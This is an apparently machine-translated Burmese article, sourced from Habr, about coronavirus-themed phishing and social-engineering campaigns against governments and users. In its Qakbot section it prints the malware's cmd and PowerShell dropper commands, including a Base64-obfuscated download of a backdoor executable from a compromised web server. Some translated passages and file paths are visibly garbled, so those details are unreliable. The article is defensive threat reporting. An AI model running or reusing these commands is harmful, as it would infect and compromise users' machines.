ကိုရိုနာဗိုင်းရပ်ဆိုက်ဘာတိုက်ခိုက်မှု- အချက်တစ်ခုလုံးသည် လူမှုရေးအင်ဂျင်နီယာတွင်ဖြစ်သည်။

တိုက်ခိုက်သူများသည် COVID-19 ခေါင်းစဉ်ကို ဆက်လက်အသုံးချကာ ကပ်ရောဂါနှင့်ပတ်သက်သည့်အရာအားလုံးကို စိတ်ပါဝင်စားသော သုံးစွဲသူများအတွက် ခြိမ်းခြောက်မှုများ ပိုများလာစေသည်။ IN နောက်ဆုံးပို့စ် ကိုရိုနာဗိုင်းရပ်နောက်ပိုင်း ဘယ်လို malware အမျိုးအစားတွေပေါ်လာလဲဆိုတာကို ကျွန်တော်တို့ပြောထားပြီးသားဖြစ်ပြီး၊ ဒီနေ့မှာတော့ ရုရှားအပါအဝင် နိုင်ငံအသီးသီးက သုံးစွဲသူတွေကြုံတွေ့ခဲ့ရတဲ့ လူမှုအင်ဂျင်နီယာနည်းပညာတွေအကြောင်း ဆွေးနွေးသွားမှာပါ။ အထွေထွေ လမ်းကြောင်းများနှင့် ဥပမာများသည် ဖြတ်တောက်မှုအောက်တွင် ရှိနေသည်။

ထဲမှာ မှတ်ထားပါ။ နောက်ဆုံးအချိန် လူတွေက ကိုရိုနာဗိုင်းရပ်နဲ့ ကပ်ရောဂါရဲ့လမ်းစဉ်တွေသာမက ငွေကြေးထောက်ပံ့မှုတွေအကြောင်းလည်း ဖတ်ရှုလိုစိတ်ရှိတယ်ဆိုတဲ့အချက်ကို ငါတို့ပြောခဲ့ကြတယ်။ ဒါကတော့ ဥပမာကောင်းတစ်ခုပါ။ စိတ်ဝင်စားစရာကောင်းသော ဖြားယောင်းတိုက်ခိုက်မှုကို ဂျာမန်မြောက်ပိုင်း Rhine-Westphalia သို့မဟုတ် NRW ပြည်နယ်တွင် ရှာဖွေတွေ့ရှိခဲ့သည်။ တိုက်ခိုက်သူများသည် စီးပွားရေးဝန်ကြီးဌာန ဝဘ်ဆိုက်၏ မိတ္တူများကို ဖန်တီးခဲ့သည် (NRW စီးပွားရေးရေးရာဝန်ကြီးဌာန) ငွေကြေးအကူအညီအတွက် မည်သူမဆို လျှောက်ထားနိုင်ပါသည်။ ထိုကဲ့သို့သောပရိုဂရမ်သည် အမှန်တကယ်ရှိနေပြီး၊ ၎င်းသည် လိမ်လည်သူများအတွက် အကျိုးရှိစေပါသည်။ သေဆုံးသူများ၏ ကိုယ်ရေးကိုယ်တာအချက်အလက်များကို လက်ခံရရှိပြီးနောက် ၎င်းတို့သည် စစ်မှန်သောဝန်ကြီးဌာနဝက်ဘ်ဆိုက်တွင် လျှောက်လွှာတင်ခဲ့သော်လည်း အခြားဘဏ်အသေးစိတ်အချက်အလက်များကို ဖော်ပြခဲ့သည်။ တရားဝင်အချက်အလက်များအရ အဆိုပါအစီအစဉ်ကို မတွေ့မချင်း ထိုသို့သော အတုအယောင်တောင်းဆိုမှုပေါင်း ၄ဝဝဝ ကို ပြုလုပ်ခဲ့သည်။ ရလဒ်အနေဖြင့် ထိခိုက်နစ်နာသူ နိုင်ငံသားများအတွက် ရည်ရွယ်ထားသည့် ဒေါ်လာ ၁၀၉ သန်းသည် လိမ်လည်သူများ၏ လက်ထဲသို့ ကျရောက်သွားသည်။

သင်သည် COVID-19 အတွက် အခမဲ့စမ်းသပ်မှု ပြုလုပ်လိုပါသလား။

coronavirus-themed phishing ၏နောက်ထပ်ထင်ရှားသောဥပမာမှာ ရှာဖွေတွေ့ရှိခဲ့သည်။ အီးမေးလ်များတွင် မက်ဆေ့ချ်များသည် ကိုရိုနာဗိုင်းရပ်ကူးစက်မှုကို အခမဲ့စစ်ဆေးမှုခံယူရန် ကမ်းလှမ်းချက်ဖြင့် သုံးစွဲသူများ၏ အာရုံစိုက်မှုကို ဆွဲဆောင်ခဲ့သည်။ ဥပါဒါန်၌ စာတွေ Trickbot/Qakbot/Qbot ၏ ဥပမာများ ရှိခဲ့သည်။ ၎င်းတို့၏ကျန်းမာရေးကို စစ်ဆေးလိုသူများသည် “ပူးတွဲပါဖောင်ကို ဖြည့်စွက်” စတင်သောအခါတွင် အန္တရာယ်ရှိသော script ကို ကွန်ပျူတာသို့ ဒေါင်းလုဒ်လုပ်ခဲ့သည်။ sandboxing စမ်းသပ်ခြင်းကို ရှောင်ရှားရန်အတွက် အကာအကွယ်စနစ်များက အန္တရာယ်ရှိသော လုပ်ဆောင်မှုမျိုး ဖြစ်ပေါ်လာမည်မဟုတ်ကြောင်း ယုံကြည်လာသောအခါတွင် ပင်မဗိုင်းရပ်စ်ကို script က စတင်ဒေါင်းလုဒ်လုပ်ခဲ့သည်။

Macros ကိုဖွင့်ရန် အသုံးပြုသူအများစုကို ဆွဲဆောင်ခြင်းသည်လည်း လွယ်ကူပါသည်။ ၎င်းကိုလုပ်ဆောင်ရန်၊ စံလှည့်ကွက်ကိုအသုံးပြုခဲ့သည်- မေးခွန်းလွှာကိုဖြည့်ရန်၊ သင်သည် ဦးစွာ macros ကိုဖွင့်ရန် လိုအပ်သည်၊ ဆိုလိုသည်မှာ သင်သည် VBA script ကို run ရန်လိုအပ်သည်။

သင်တွေ့မြင်ရသည့်အတိုင်း၊ VBA script ကို antiviruses များမှ အထူးဖုံးကွယ်ထားသည်။

Windows တွင် အပလီကေးရှင်းသည် ပုံသေ “Yes” အဖြေကို လက်ခံခြင်းမပြုမီ /T <စက္ကန့်> စောင့်ဆိုင်းသည့် အင်္ဂါရပ်တစ်ခုရှိသည်။ ကျွန်ုပ်တို့၏အခြေအနေတွင်၊ ဇာတ်ညွှန်းသည် ယာယီဖိုင်များကိုမဖျက်မီ 65 စက္ကန့်စောင့်ခဲ့သည်-

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

စောင့်ဆိုင်းနေစဉ်တွင် malware ကို ဒေါင်းလုဒ်လုပ်ခဲ့သည်။ ဤအတွက် အထူး PowerShell script ကို စတင်လိုက်သည်-

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

Base64 တန်ဖိုးကို ကုဒ်ဖျက်ပြီးနောက်၊ PowerShell script သည် ဂျာမနီမှ ယခင်က ဟက်ခ်ခံရသော ဝဘ်ဆာဗာတွင်ရှိသော backdoor ကို ဒေါင်းလုဒ်လုပ်သည်-

http://automatischer-staubsauger.com/feature/777777.png

အမည်အောက်တွင် သိမ်းဆည်းပါ။

C:UsersPublictmpdirfile1.exe

ဖိုငျတှဲ ‘C:UsersPublictmpdir’ command ပါရှိသော 'tmps1.bat' ဖိုင်ကို run သောအခါ ဖျက်ပစ်သည်။ cmd /c mkdir ""C:UsersPublictmpdir"".

အစိုးရဌာနများကို ပစ်မှတ်ထား တိုက်ခိုက်ခဲ့သည်။

ထို့အပြင် FireEye လေ့လာဆန်းစစ်သူများသည် Wuhan ရှိ အစိုးရအဆောက်အဦများနှင့် တရုတ် အရေးပေါ်စီမံခန့်ခွဲမှုဝန်ကြီးဌာနတို့ကို ရည်ရွယ်သည့် APT32 တိုက်ခိုက်မှုကို မကြာသေးမီက အစီရင်ခံတင်ပြခဲ့သည်။ ဖြန့်ဝေထားသော RTF များထဲမှ တစ်ခုတွင် ခေါင်းစဉ်တပ်ထားသော New York Times ဆောင်းပါးတစ်ခုသို့ လင့်ခ်တစ်ခုပါရှိသည်။ Coronavirus တိုက်ရိုက်မွမ်းမံမှုများ- တရုတ်နိုင်ငံသည် Hubei မှခရီးသွားများကိုခြေရာခံနေသည်။. သို့သော် ၎င်းကိုဖတ်ပြီးနောက်၊ malware ဒေါင်းလုဒ်လုပ်ခဲ့သည် (FireEye လေ့လာဆန်းစစ်သူများသည် ယင်းကို METALJACK အဖြစ် သတ်မှတ်ခဲ့သည်)။

စိတ်ဝင်စားစရာမှာ၊ ရှာဖွေတွေ့ရှိသည့်အချိန်တွင်၊ Virustotal ၏အဆိုအရ ဤဥပမာကို ဗိုင်းရပ်စ်ပိုးမွှားတစ်ခုမှ မတွေ့ရှိခဲ့ပါ။

တရားဝင် ဝဘ်ဆိုဒ်တွေ ပျက်တဲ့အခါ

ရုရှားတွင် ဖြားယောင်းသော တိုက်ခိုက်မှု၏ အထူးခြားဆုံး ဥပမာမှာ မနေ့တနေ့ကပင် ဖြစ်ခဲ့သည်။ ယင်းအတွက် အကြောင်းရင်းမှာ အသက် ၃ နှစ်မှ ၁၆ နှစ်ကြား ကလေးများအတွက် နှစ်ရှည်လများ စောင့်မျှော်ခဲ့သော အကျိုးခံစားခွင့်ကို ခန့်အပ်ရခြင်း ဖြစ်သည်။ လျှောက်လွှာများလက်ခံခြင်းကို မေလ 3 ရက်၊ 16 တွင်ကြေငြာသောအခါ သန်းပေါင်းများစွာသည် ကာလကြာရှည်စောင့်ဆိုင်းခဲ့ရသောအကူအညီအတွက် State Services ဝဘ်ဆိုက်သို့ အပြေးအလွှားရောက်ရှိလာကြပြီး ပရော်ဖက်ရှင်နယ် DDoS တိုက်ခိုက်မှုထက် ပိုဆိုးခြင်းမရှိသော portal ကို ဖြုတ်ချခဲ့သည်။ “အစိုးရ၀န်ဆောင်မှုများသည် လျှောက်လွှာစီးဆင်းမှုကို ထိန်းကျောင်းနိုင်မည်မဟုတ်” ဟု သမ္မတက ပြောကြားသောအခါတွင် လူများသည် လျှောက်လွှာလက်ခံခြင်းအတွက် အစားထိုးဆိုက်တစ်ခု စတင်ခြင်းအကြောင်း အွန်လိုင်းတွင် ပြောဆိုလာကြသည်။

ပြဿနာမှာ ဆိုက်များစွာသည် တစ်ပြိုင်နက်တည်း စတင်လုပ်ဆောင်နေပြီး တစ်ခုဖြစ်သည့် posobie16.gosuslugi.ru တွင် အမှန်တကယ် အက်ပ်လီကေးရှင်းများကို အမှန်တကယ် လက်ခံနေချိန်တွင်၊ ယုံလွယ်သောအသုံးပြုသူများ၏ ကိုယ်ရေးကိုယ်တာအချက်အလက်များကို ဒါဇင်ပေါင်းများစွာက စုဆောင်းသည်။.

SearchInform မှလုပ်ဖော်ကိုင်ဖက်များသည် .ru ဇုန်ရှိ လိမ်လည်သောဒိုမိန်းအသစ် 30 ခန့်ကို တွေ့ရှိခဲ့သည်။ Infosecurity နှင့် Softline ကုမ္ပဏီတို့သည် ဧပြီလအစကတည်းက အလားတူ အစိုးရဝန်ဆောင်မှု ၀က်ဘ်ဆိုဒ် ၇၀ ကျော်ကို ခြေရာခံခဲ့သည်။ ၎င်းတို့၏ဖန်တီးသူများသည် ရင်းနှီးသောသင်္ကေတများကို ခြယ်လှယ်ပြီး gosuslugi၊ gosuslugi-70၊ vyplaty၊ covid-vyplaty၊ posobie စသည်ဖြင့် စကားလုံးများကို ပေါင်းစပ်အသုံးပြုပါသည်။

Hype နှင့်လူမှုရေးအင်ဂျင်နီယာ

ဤနမူနာများအားလုံးသည် တိုက်ခိုက်သူများသည် coronavirus ၏အကြောင်းအရာကို အောင်မြင်စွာငွေရှာနေကြောင်း အတည်ပြုရုံသာဖြစ်သည်။ လူမှုရေးတင်းမာမှု မြင့်မားလေနှင့် မရှင်းလင်းသော ပြဿနာများ ပိုများလေလေ၊ လိမ်လည်လှည့်ဖြားသူများသည် အရေးကြီးသော ဒေတာကို ခိုးယူရန်၊ လူများအား ၎င်းတို့၏ ပိုက်ဆံကို ၎င်းတို့ကိုယ်တိုင် စွန့်လွှတ်ရန် အတင်းအကျပ်ခိုင်းစေခြင်း သို့မဟုတ် ကွန်ပြူတာများကို ဟက်ခ်လုပ်ရန် အခွင့်အလမ်း ပိုများလေလေဖြစ်သည်။

ကပ်ရောဂါကြောင့် ကြိုတင်ပြင်ဆင်ထားခြင်းမရှိသော လူများကို အိမ်တွင်းမှ အလုပ်ခိုင်းစေခြင်းဖြင့် ကိုယ်ရေးကိုယ်တာသာမက ကော်ပိုရိတ်ဒေတာကိုပါ အန္တရာယ်ဖြစ်စေပါသည်။ ဥပမာအားဖြင့်၊ မကြာသေးမီက Microsoft 365 (ယခင် Office 365) အသုံးပြုသူများသည်လည်း phishing တိုက်ခိုက်မှုကို ခံခဲ့ရသည်။ လူများသည် ကြီးမားသော "လွတ်သွားသည်" အသံမက်ဆေ့ဂျ်များကို စာများနှင့်တွဲဆက်မှုအဖြစ် လက်ခံရရှိခဲ့သည်။ သို့ရာတွင်၊ ဖိုင်များသည် အမှန်တကယ်အားဖြင့် တိုက်ခိုက်ခံရသူများထံသို့ ပေးပို့သော HTML စာမျက်နှာတစ်ခုဖြစ်သည်။ Microsoft 365 လက်မှတ်ထိုးဝင်သည့် စာမျက်နှာအတု. ရလဒ်အနေဖြင့်၊ အကောင့်မှဒေတာအားလုံးကိုဝင်ရောက်ခွင့်ဆုံးရှုံးခြင်းနှင့်အပေးအယူလုပ်ပါ။

source: www.habr.com